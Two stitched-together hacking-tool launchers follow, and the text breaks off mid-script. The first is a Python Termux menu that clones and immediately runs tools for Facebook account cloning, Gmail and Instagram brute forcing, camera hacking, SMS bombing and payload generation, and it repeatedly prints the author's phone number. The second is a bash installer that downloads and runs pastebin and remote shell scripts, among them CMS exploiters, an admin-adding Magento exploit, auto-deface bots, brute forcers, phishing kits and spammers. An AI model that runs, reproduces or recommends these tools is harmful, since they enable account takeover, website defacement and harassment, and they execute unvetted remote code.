sys.setdefaultencoding('utf8') br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1) br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] os.system("clear") done = False def animate(): for c in itertools.cycle(['\033[1;96m|', '\033[1;92m/', '\033[1;95m-', '\033[1;91m\\']): if done: break sys.stdout.write('\r\033[1;93mLoading ' + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c ) sys.stdout.flush() time.sleep(0.001) t = threading.Thread(target=animate) t.start() time.sleep(5) done = True def keluar(): print "\033[1;97m{\033[1;91m!\033[1;97m} Keluar" os.sys.exit() def acak(x): w = 'mhkbpcP' d = '' for i in x: d += '!'+w[random.randint(0,len(w)-1)]+i return cetak(d) def cetak(x): w = 'mhkbpcP' for i in w: j = w.index(i) x= x.replace('!%s'%i,'%s;'%str(31+j)) x += '' x = x.replace('!0','') sys.stdout.write(x+'\n') def jalan(z): for e in z + '\n': sys.stdout.write(e) sys.stdout.flush() time.sleep(0.00001) ##### LOGO ##### logo = """ \033[1;96mPAK HACKERS░░░\033[1;92m░░░SHABIRBALOCH╗░░WEBDEVELOPER╗░AND╗░░A\033[1;91mETICALHACKER╗ \033[1;96mYT╔══M4╗B4║░\033[1;92m░░░░WEBHACKER╔══PAK╗ANONAYMOUS╔══YOUTUBE╗CHANNEL║\033[1;91m░B4_BALOCH_M4_MASTER╔╝ \033[1;96mPAKISTANI╦╝HACKERS\033[1;92m║░░░░░███████║██║░░╚═╝\033[1;91m█████═╝░ \033[1;96mWEBHACKER╔══SHABIRBALOCH╗\033[1;92m██║░░░░░██╔══██║██║░░\033[1;91m██╗██╔═██╗░ \033[1;96mWHATSAPP\033[1;92m╦╝03232132362╗██║░░██║╚█\033[1;91m████╔╝██║░╚██╗ \033[1;96m╚═══\033[1;92m══╝░╚══════╝╚═╝░░╚═╝\033[1;91m░╚════╝░╚═╝░░╚═╝ \033[1;96mHACK\033[1;92mTHE╗░░░HACKERS╗░BALOCH╗░HACKERS\033[1;91m████╗██╗░█████╗░ \033[1;96mWE\033[1;92mARE╗░LEGION║WE╔══NEVER╗\033[1;91mFORGIVE╔════╝SPEED█║LIMIT█╔══INCREASED█╗ \033[1;92mVISIT╔█OUR█╔YT║█CHANNEL█\033[1;91mB4║█BALOCH█╗░░M4║██MASTER██║ \033[1;92m██║╚██╔╝██║██╔\033[1;91m══██║██╔══╝░░██║██╔══██║ \033[1;92m██║░╚═╝░██║█\033[1;91m█║░░██║██║░░░░░██║██║░░██║ \033[1;92m╚═╝░░░░░╚═\033[1;91m╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═╝░░╚═╝ \033[1;47m\033[1;31m PAKISTANI HACKER \033[1;0m \033[1;96m«-----------------\033[1;91mSHABIR BALOCH\033[1;96m-----------------» \033[1;91m ┈┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈┈┈ BALOCH \033[1;91m ┈┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈┈┈ HACKER \033[1;91m ┈┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈┈┈ \033[1;91m ┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈┈ WhatsApp \033[1;91m ┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈┈ 03232132362 \033[1;96m«-----------------\033[1;91mBELLA\033[1;96m-----------------»""" R = '\033[1;91m' G = '\033[1;92m' Y = '\033[1;93m' B = '\033[1;94m' P = '\033[1;95m' S = '\033[1;96m' W = '\033[1;97m' ######Clear###### def clear(): os.system('clear') #### time sleep #### def t(): time.sleep(1) def t1(): time.sleep(0.01) #### print std #love### def love(z): for e in z + "\n": sys.stdout.write(e) sys.stdout.flush() t1() def menu(): os.system('clear') pkgs() os.system('clear') print(logo) os.system('clear') os.system('echo SHABIR░░░░░░BALOCH░░PAKISTANI░ETICAL░░HACKER | lolcat -a -F 0.1') os.system('echo SHABIR░░░░░BALOCH██WEB██DEVELOPER░██ | lolcat -a -F 0.1') os.system('echo WHATSAPP░░░░░03232132362░░FOR THIS SCRIPT░ | lolcat -a -F 0.1') os.system('echo CONTACT ░░░░░ME ON WHATSAPP░░BALOCH CYBER HACKER░ | lolcat -a -F 0.1') os.system('echo WE ARE ░░ANONAYMOUS░WE ARE LEGION WE NEVER GORFIVE | lolcat -a -F 0.1') os.system('echo WE NEVER FORGET░ASPECT ░░ US ░KNOWLEDGE░IS░░FREE | lolcat -a -F 0.1') os.system('echo HI, I AM SHABIR BALOCH A ETICAL HACKER | lolcat -a -F 0.1') os.system('echo WE ARE ANONYMOUS WE ARE LEGION WE NEVER FORGIVE WE NEVER FORGET ASPECT US | lolcat -a -F 0.1') os.system('echo SHABIR BALOCH WHATSAPP = 03232132362 | lolcat -a -F 0.1') os.system('echo VISIT OUR YOUTUBE CHANNEL B4 BALOCH M4 MASTER | lolcat -a -F 0.1') os.system('echo PAKISTANI ETICAL HACKER AND A PROGRAMMER | lolcat -a -F 0.1') os.system('echo LETS░░░░░ENJOY░░OUR░░░░░TOOL░░THANKS | lolcat -a -F 0.1') os.system('echo ------ Your Mind is Your Best Weapon------&&date | lolcat -a -F 0.1') os.system('echo ----------------BELLA-----------------| lolcat') os.system('echo ┈┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈◢▇◣◢▇◣┈┈┈┈ SHABIR BALOCH| lolcat --animate') os.system('echo ┈┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈▇▇▇▇▇▇┈┈┈┈ BALOCHHACKER| lolcat --animate') os.system('echo ┈┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈◥▇▇▇▇◤┈┈┈┈| lolcat') os.system('echo ┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈◥▇▇◤┈┈┈┈┈ WhatsApp| lolcat --animate') os.system('echo ┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈◥◤┈┈┈-̴̧̬͖͇̟̟̼̱͙̠͉̟̹̘̖̥͈͖͚̯͗͑͌̃̿͗̈̿̿̏͗̑̀̀͘┈┈┈03232132362| lolcat --animate') os.system('echo -----------------BELLA---------------| lolcat --animate') os.system('echo To return to this menu from any Tool| lolcat --animate') time.sleep(0.0005) os.system('echo Stop Process Press. CTRL + z| lolcat --animate') time.sleep(0.0005) os.system('echo Type python2 B4BALOCH.py| lolcat --animate') os.system('echo -----------------SHABIR BALOCH----------------| lolcat --animate') time.sleep(0.0005) os.system('echo [A] Install Random Mail Cloning--------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [B] Install Email Cloning--------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [C] Install Manual Password------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [D] Install Group Cloning--------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [E] Install With Out Fb Id-------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [F] Install Facebook Target------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [G] Install SpiderMan------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [H] Install Kalilinux------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [I] Install BlackHat-------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [J] Install RedMoonNew------------------------ Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [K] Install love3Hack3r----------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [L] Install B4 BALOCH Clonnig----------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [M] Install Web Admin Panel Finder------------ Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [N] Install Attacker-------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [O] Install Payload--------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [P] Install CamHacker------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [Q] Install Compiler-------------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [R] Install Instagram Brut-------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [S] Install Marsh Base------------------------ Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [T] Install Gmail Target---------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [U] Install Termux Logo----------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [V] Install Termux TBomb---------------------- Tool ----● | lolcat --animate') time.sleep(0.0005) os.system('echo [W] B4 BALOCH M4 MASTER WhatsApp Group-------- Tool----● | lolcat --animate') time.sleep(0.0005) os.system('echo [X] BlackMafia Dragon404 New Update -----● | lolcat -a -F 0.01') time.sleep(0.0005) os.system('echo [Y] Tool Update--------------------------● | lolcat --animate') time.sleep(0.0005) os.system('echo [Z] EXIT | lolcat -a -F 0.1') time.sleep(0.0005) os.system('echo Slect Option A-Z➣➤| lolcat -a -F 0.1 ') mafia() def mafia(): black = raw_input('\033[1;91m┺\033[1;92m──\033[1;97m──\033[1;96m──\033[1;95m──\033[1;94m──\033[1;92m──\033[1;96m──━\033[1;93m➢\033[1;92m➣\033[1;91m➤') if black =="": print (" ShabirBaloch!") mafia() elif black =="A" or black =="a": clear() print(logo) os.system("rm -rf $HOME/random") clear() os.system("cd $HOME && git clone https://github.com/lovehacker404/random") print (logo) time.sleep(5) os.system("cd $HOME/random && python2 lovehacker.py") elif black =="B" or black =="b": clear() print(logo) os.system("rm -rf $HOME/email") os.system("cd $HOME && git clone https://github.com/lovehacker404/email") print (logo) time.sleep(5) os.system("cd $HOME/email && python2 lovehacker.py") elif black =="C" or black =="c": clear() print(logo) os.system("rm -rf BELLA/Password") os.system("cd $HOME && git clone https://github.com/lovehacker404/Password") print (logo) time.sleep(5) os.system("cd BELLA/Password && python2 lovehacker.py") elif black =="D" or black =="d": clear() print(logo) os.system("rm -rf BELLA/lovehack") os.system("cd $HOME && git clone https://github.com/lovehacker404/lovehack") print (logo) time.sleep(5) os.system("cd $HOME/lovehack && python2 lovehacker.py") elif black =="E" or black =="e": clear() print(logo) os.system("rm -rf $HOME/402") os.system("cd $HOME && git clone https://github.com/lovehacker404/402") print (logo) love("\033[1;93mTool User Name :\033[1;95m BELLA ") love("\033[1;93mTool Password :\033[1;95m BELLA") time.sleep(5) os.system("cd $HOME/402 && python2 Cloningx-2-1.py") elif black =="F" or black =="f": clear() print(logo) os.system("rm -rf $HOME/blackhole") os.system("cd $HOME && git clone https://github.com/lovehacker404/blackhole") print (logo) love("\033[1;93mTool User Name :\033[1;95m Black ") love("\033[1;93mTool Password :\033[1;95m Mafia ") love("\033[1;93m :Target Attack : ") love("\033[1;93mPassword list :\033[1;95mlovehacker-2.txt ") time.sleep(5) os.system("cd $HOME/blackhole && python2 AsifJaved.py") elif black =="G" or black =="g": clear() print(logo) os.system("rm -rf $HOME/Spider") os.system("cd $HOME && git clone https://github.com/lovehacker404/Spider") print (logo) love("\033[1;91mCongratulations Cobra Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name SpiderMan Password lovehacker") time.sleep(5) os.system("cd $HOME/Spider && python2 SpiderMan.py") elif black =="H" or black =="h": clear() print(logo) os.system("rm -rf $HOME/KaliIndia") os.system("cd $HOME && git clone https://github.com/lovehacker404/KaliIndia") print (logo) love("\033[1;96mCongratulations BlackMafia Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name India Password lovehacker") time.sleep(5) os.system("cd $HOME/KaliIndia && python2 kalilinux.India.py") elif black =="I" or black =="i": clear() print(logo) os.system("rm -rf $HOME/BlackHat") os.system("cd $HOME && git clone https://github.com/lovehacker404/BlackHat") print (logo) love("\033[1;96mCongratulations BlackHat Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name BlackHat Password lovehacker") time.sleep(5) os.system("cd $HOME/BlackHat && python2 BlackHat.py") elif black =="J" or black =="j": clear() print(logo) print(logo) os.system("rm -rf $HOME/RedMoonNew") os.system("cd $HOME && git clone https://github.com/lovehacker404/RedMoonNew") print (logo) love("\033[1;91mCongratulations RedMoonNew Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;93mTool User Name\033[1;92m RedMoonNew\033[1;93m Password \033[1;92mlovehacker") time.sleep(6) os.system("cd $HOME/RedMoonNew && python2 lovehacker") elif black =="K" or black =="k": clear() print(logo) print(logo) os.system("rm -rf $HOME/lov3Hak3r") os.system("cd $HOME && git clone https://github.com/lovehacker404/lov3Hak3r") print (logo) love("\033[1;96mCongratulations BlackMafia Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/lov3Hak3r && python2 lovehacker.py") elif black =="L" or black =="l": clear() print(logo) print(logo) os.system("rm -rf $HOME/B4_BALOCH") os.system("cd $HOME && git clone https://github.com/shabirbaloch398/B4_BALOCH.git") print (logo) love("\033[1;93mCongratulations Cobra Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;95mTool Dont Have Username And Password Enjoy But Use 786786 Pass Or Username On My Tool Thanks") time.sleep(5) os.system("cd $HOME/Cobra && python2 Scorpion.py") elif black =="M" or black =="m": clear() print(logo) print(logo) os.system("rm -rf $HOME/attack911") os.system("cd $HOME && git clone https://github.com/shabirbaloch398/attack911.git") print (logo) love("\033[1;91mCongratulations attack911 Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;96mAdmin Panel Finder") time.sleep(5) os.system("cd $HOME/attack911 && python2 attack911.py") elif black =="N" or black =="n": clear() print(logo) print(logo) os.system("rm -rf $HOME/Attacker") os.system("cd $HOME && git clone https://github.com/shabirbaloch398/Attacker.git") print (logo) love("\033[1;96mCongratulations Attacker Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;92mBest Script") time.sleep(5) os.system("cd $HOME/Attacker && python2 B4.py") elif black =="O" or black =="o": clear() print(logo) print(logo) os.system("pkg install unstable-repo") os.system("pkg install metasploit") os.system("pkg install msfconsole") os.system("rm -rf $HOME/Black_Mafia") os.system("cd $HOME && git clone https://github.com/lovehacker404/Black_Mafia") print (logo) love("\033[1;93mCongratulations Black_Mafia Payload Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/Black_Mafia && python3 Black_Mafia.py") elif black =="P" or black =="p": clear() print(logo) print(logo) os.system("rm -rf $HOME/Pak") os.system("cd $HOME && git clone https://github.com/lovehacker404/Pak") print (logo) love("\033[1;96mCongratulations CamHacker Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("\033[1;92mEducational Perpose only") time.sleep(2) os.system("cd $HOME/Pak && python lovehacker.py") elif black =="Q" or black =="q": clear() print(logo) os.system("rm -rf $HOME/Compile") os.system("cd $HOME && git clone https://github.com/lovehacker404/Compile") print (logo) love("\033[1;93mCongratulations Tool Has Been Update Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/Compile && python2 lovehacker.py") elif black =="R" or black =="r": clear() print(logo) print(logo) os.system("pip2 install bs4") os.system("rm -rf $HOME/Insta") os.system("cd $HOME && git clone https://github.com/lovehacker404/Insta") print (logo) love("\033[1;93mCongratulations Tool Has Been Update Successfully") love("Now you can open this tool as usual") love("Passwordlist No1 (wordlist.txt) No2 (BlackMafia.txt)") time.sleep(5) os.system("cd $HOME/Insta && python2 lovehacker.py") elif black =="S" or black =="s": clear() print(logo) os.system("rm -rf $HOME/TimePass") os.system("cd $HOME && git clone https://github.com/lovehacker404/TimePass") print (logo) love("\033[1;93mCongratulations Tool Has Been Update Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/TimePass && python2 lovehacker.py") elif black =="T" or black =="t": clear() print(logo) print(logo) os.system("rm -rf $HOME/GmailAttack") os.system("cd $HOME && git clone https://github.com/lovehacker404/GmailAttack") print (logo) love("\033[1;96mCongratulations GmailAttack Tool Has Been Installed Successfully") love("Now you can open this tool as usual") love("plz wi8 Password list name (lovehacker-1.txt) ") time.sleep(6) os.system("cd $HOME/GmailAttack && python2 lovehacker.py") elif black =="U" or black =="u": clear() print(logo) print(logo) os.system("rm -rf $HOME/Logo") os.system("cd $HOME && git clone https://github.com/lovehacker404/Logo") print (logo) love("\033[1;96mCongratulations BlackMafia Logo Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/Logo && bash lovehacker.sh") elif black =="V" or black =="v": clear() print(logo) os.system("rm -rf $HOME/sms") os.system("cd $HOME && git clone https://github.com/lovehacker404/sms") print (logo) love("\033[1;96mCongratulations BlackMafia TBomb Tool Has Been Installed Successfully") love("Now you can open this tool as usual") time.sleep(5) os.system("cd $HOME/sms && bash BlackMafia.sh") elif black =="W" or black =="w": clear() print(logo) love("Welcome To B4 BALOCH M4 MASTER WhatsApp Group") time.sleep(5) os.system('xdg-open https://chat.whatsapp.com/BcmyQPBz6lz3t6oVN8wLoi') elif black =="X" or black =="x": clear() print(logo) love("Welcome To B4 BALOCH 2nd Tool") love("BlackMafia 2nd Tool Start") love("Coming Soon New Update") time.sleep(5) os.system("rm -rf $HOME/Dragon404") os.system("cd $HOME && git clone https://github.com/lovehacker404/Dragon404") print (logo) love("\033[1;96mCongratulations Dragon404 Tool Has Been Installed Successfully") love("Wellcom to Dragon404 tool") os.system("cd $HOME/Dragon404 && python2 lovehacker.py") elif black =="Y" or black =="y": clear() print(logo) os.system("rm -rf $HOME/World") os.system("pip install lolcat") os.system("cd $HOME && git clone https://github.com/lovehacker404/World") print (logo) love("\033[1;96mCongratulations BlackMafia Tool Has Been Update Successfully") time.sleep(5) os.system("cd $HOME/World && python2 Cloning.py") elif black =="Z" or black =="z": os.system("exit") if __name__ == "__main__": menu()
60-n3z
#!/data/data/com.termux/files/usr/bin/bash # Auto Install Tools v.2.1 # coded By Mr.60-n3z # dark line asosiasion # Bersihkan Layar clear blue='\e[0;34' cyan='\e[0;36m' green='\e[0;34m' okegreen='\033[92m' lightgreen='\e[1;32m' white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' ################################################### # CTRL C ################################################### trap ctrl_c INT ctrl_c() { clear echo -e $red"[#]> (Ctrl + C ) Detected, Trying To Exit ... " sleep 1 echo "" echo -e $green"[#]> Terima kasih sudah make tools saya ... " sleep 1 echo "" echo -e $white"[#]> Mr.60-n3z Wuzz Here ... " read enter exit } echo -e $red" —-oooO—-" echo -e $red" —-(—)—-" echo -e $white" —–\–(–" echo -e $white" ——\_)-" echo -e $red" ***********************************************" echo -e $white" # $red toolkit for hackers v2.1 $white #" echo -e $red" # $red happy fun guys $red #" echo -e $white" # $red contact: mr.60-n3z drak cyber.net $white #" echo -e $red" # $white greetz :Dark line - Anonymous Cyber team $red#" echo -e $white" # $white copyright : ./Mr 60-n3z $white #" echo -e $red" # $white thanks to : 4wsec - Mr.haikal $red #" echo -e $white" ***********************************************" echo "" echo -e $green" 01) Red Hawk" echo -e $green" 02) D-Tect" echo -e $green" 03) Hunner" echo -e $green" 04) WPScan" echo -e $green" 05) Webdav" echo -e $green" 06) Metasploit" echo -e $green" 07) Kali Nethunter" echo -e $green" 08) Ubuntu" echo -e $green" 09) Youtube Dl" echo -e $green" 10) viSQL " echo -e $green" 11) Weeman" echo -e $green" 12) WFDroid" echo -e $green" 13) FBBrute" echo -e $green" 14) Ngrok" echo -e $green" 15) Torshammer " echo -e $green" 16) RouterSploit " echo -e $green" 17) Hydra " echo -e $green" 18) Weevely " echo -e $green" 19) SQLMap " echo -e $green" 20) Dirbuster " echo -e $green" 21) admin finder " echo -e $green" 22) lokomedia exploiter " echo -e $green" 23) elfinder exploiter " echo -e $green" 24) magento add admin exploiter " echo -e $green" 25) scanner tools " echo -e $green" 26) bing dorker " echo -e $green" 27) katoolin " echo -e $green" 28) arch linux " echo -e $green" 29) linux fedora" echo -e $green" 30) hash-buster" echo -e $green" 31) sudo" echo -e $green" 32) aircrack-ng" echo -e $green" 33) joomscan" echo -e $green" 34) bing-ip2hosts" echo -e $green" 35) BlueMaho" echo -e $green" 36) Bluepot" echo -e $green" 37) honeypot" echo -e $green" 38) bot auto deface 1" echo -e $green" 39) bot auto deface 2" echo -e $green" 40) mailer sender cli" echo -e $green" 41) Wordpress Brute Force" echo -e $green" 42) Oh-myzsh theme for termux" echo -e $green" 43) instabot (instagram bot)" echo -e $green" 44) fsociety" echo -e $green" 45) Cms Scanner" echo -e $green" 46) Information Gathering" echo -e $green" 47) com_fabrik exploiter" echo -e $green" 48) com foxcontact exploiter" echo -e $green" 49) gmail brute force" echo -e $green" 50) ezsploit" echo -e $green" 51) spammer-grab sms" echo -e $green" 52) spammer call toko-pedia" echo -e $green" 53) The Fat Rat" echo -e $green" 54) IPGeolocation" echo -e $green" 55) exit" echo -e $white"" read -p "[60-n3z @Tools]> " act; if [ $act = 01 ] || [ $act = 01 ] then clear echo -e $green" Installing Red Hawk " sleep 1 apt update && apt upgrade apt install php apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK echo -e $blue" sampun rampung " fi if [ $act = 02 ] || [ $act = 02 ] then clear echo -e $green" Installing D-Tect " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 git clone https://github.com/shawarkhanethicalhacker/D-TECT echo -e $red" pun rampung mas " fi if [ $act = 03 ] || [ $act = 03 ] then clear echo -e $green" Installing Hunner " sleep 1 apt-get update && apt-get upgrade apt install python apt install git git clone https://github.com/b3-v3r/Hunner echo -e $red" sampun mantun mas " fi if [ $act = 04 ] || [ $act = 04 ] then clear echo -e $green" Installing Wpscan " sleep 1 apt-get update && apt-get upgrade apt install ruby apt install curl apt install git git clone https://github.com/wpscanteam/wpscan cd ~/wpscan gem install bundle bundle config build.nokogiri --use-system-libraries bundle install ruby wpscan.rb --update cd ~/ echo -e $red" wes mari cak " fi if [ $act = 05 ] || [ $act = 05 ] then clear echo -e $green" Installing Webdav " sleep 1 apt update && apt upgrade apt install python2 pip2 install urllib3 chardet certifi idna requests apt install openssl curl pkg install libcurl mkdir webdav cd ~/webdav wget https://pastebin.com/raw/HnVyQPtR -O webdav.py chmod 777 webdav.py cd ~/ echo -e $red" pun rampung boz " fi if [ $act = 06 ] || [ $act = 06 ] then clear echo -e $green" Installing Metasploit " sleep 1 apt update && apt upgrade apt install git apt install wget wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.sh chmod 777 install.sh sh install.sh echo -e $red" Mari Install Cuk " fi if [ $act = 07 ] || [ $act = 07 ] then clear echo -e $green" Installing Kali Nethunter " sleep 1 apt update && apt upgrade apt install git git clone https://github.com/Hax4us/Nethunter-In-Termux.git cd ~/Nethunter-In-Termux chmod 777 kalinethunter sh kalinethunter echo -e $red" pun ng Install Cuk " fi if [ $act = 08 ] || [ $act = 08 ] then clear echo -e $green" Installing Ubuntu " sleep 1 apt update && apt upgrade apt install git apt install wget apt install proot git clone https://github.com/Neo-Oli/termux-ubuntu.git cd ~/termux-ubuntu chmod +x ubuntu.sh sh ubuntu.sh echo " Fix network please wait " sleep 1 echo "nameserver 8.8.8.8" > /data/data/com.termux/files/home/termux-ubuntu/ubuntu-fs/etc/resolv.conf echo -e $red" Sampun mantun " fi if [ $act = 09 ] || [ $act = 09 ] then clear echo -e $green" Installing Youtube DL " sleep 1 apt update && apt upgrade apt install python pip3 install mps_youtube pip3 install youtube_dl apt install mpv echo " Untuk menjalankannya ketik "mpsyt" tanpa tanda petik " echo -e $red" Done Install Cuk " fi if [ $act = 10 ] || [ $act = 10 ] then clear echo -e $green" Installing viSQL " sleep 1 apt update && apt upgrade pkg install git pkg install python2 git clone https://github.com/blackvkng/viSQL.git cd ~/viSQL chmod 777 viSQL.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 11 ] || [ $act = 11 ] then clear echo -e $green" Installing Weeman " sleep 1 apt update && apt upgrade pkg install git apt install python2 git clone https://github.com/samyoyo/weeman cd ~/weeman pip2 install beautifulsoup pip2 install bs4 cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 12 ] || [ $act = 12 ] then clear echo -e $green" Installing WFDroid " sleep 1 apt update && apt upgrade apt install wget mkdir wfdroid cd ~/wfdroid wget https://raw.githubusercontent.com/bytezcrew/wfdroid-termux/master/wfdinstall chmod 777 wfdinstall sh wfdinstall cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 13 ] || [ $act = 13 ] then clear sleep 1 echo -e $green" Installing FBBrute " apt install python2 apt install python2-dev apt install wget pip2 install mechanize mkdir fbbrute cd ~/fbbrute wget https://pastebin.com/raw/aqMBt2xA -O fbbrute.py wget http://override.waper.co/files/password.apk mv password.apk password.txt chmod 777 fbbrute.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 14 ] || [ $act = 14 ] then clear echo -e $green" Installing Ngrok " sleep 1 apt install wget mkdir ngrok cd ~/ngrok wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip unzip ngrok-stable-linux-arm.zip cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 15 ] || [ $act = 15 ] then clear echo -e $green" Installing Hammer " sleep 1 pkg update pkg upgrade pkg install python pkg install git git clone https://github.com/cyweb/hammer cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 16 ] || [ $act = 16 ] then clear echo -e $green" Installing Routersploit " sleep 1 apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 17 ] || [ $act = 17 ] then clear echo -e $green" Installing Hydra " sleep 1 apt update && apt install -y wget apt install hydra wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 18 ] || [ $act = 18 ] then clear echo -e $green" Installing Weevely " sleep 1 pkg update pkg upgrade git clone https://github.com/glides/Weevely cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 19 ] || [ $act = 19 ] then clear echo -e $green" Installing SQLMap " sleep 1 apt update && apt upgrade apt install python2 git clone https://github.com/sqlmapproject/sqlmap.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 20 ] || [ $act = 20 ] then clear echo -e $green" Installing Dirbuster " sleep 1 apt-get update apt-get install python apt-get install git git clone https://github.com/maurosoria/dirsearch.git cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 21 ] || [ $act = 21 ] then clear echo -e $green" Installing admin finder " sleep 1 apt update && apt upgrade apt-get install php mkdir adfin cd ~/webdav wget https://pastebin.com/raw/32txZ6Qr -O adfin.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 22 ] || [ $act = 22 ] then clear echo -e $green" installing lokomedia exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir lokomed cd ~/lokomed wget https://pastebin.com/raw/sPpJRjCZ -O lokomedia.php cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : php lokomedia.php a.txt " fi if [ $act = 23 ] || [ $act = 23 ] then clear echo -e $green" installing elfinder exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir elfinder cd ~/elfinder wget https://pastebin.com/raw/S7Y2V19h -O elfinder.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 24 ] || [ $act = 24 ] then clear echo -e $green" installing magento add admin exploiter " sleep 1 apt update && apt upgrade apt-get install php mkdir magento cd ~/magento wget https://pastebin.com/raw/PXkG73pG -O magento.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 25 ] || [ $act = 25 ] then clear echo -e $green" installing scanner tools " sleep 1 apt update && apt upgrade apt install python2 mkdir scanner cd ~/scanner wget https://pastebin.com/raw/m79t1Zia -O scanner.py wget https://pastebin.com/raw/mgKxMWXh -O admins.1337 wget https://pastebin.com/raw/EafKj98D -O files.1337 cd ~/ echo -e $red" Done Install Cuk " echo -e $red" usage : python2 scanner.py site.com -m files " fi if [ $act = 26 ] || [ $act = 26 ] then clear echo -e $green" installing bing dorker " sleep 1 apt update && apt upgrade apt-get install php mkdir bing cd ~/bing wget https://pastebin.com/raw/tjQY6Tsg -O dorker.php cd ~/ echo -e $red" Done Install Cuk " fi if [ $act = 27 ] || [ $act = 27 ] then clear 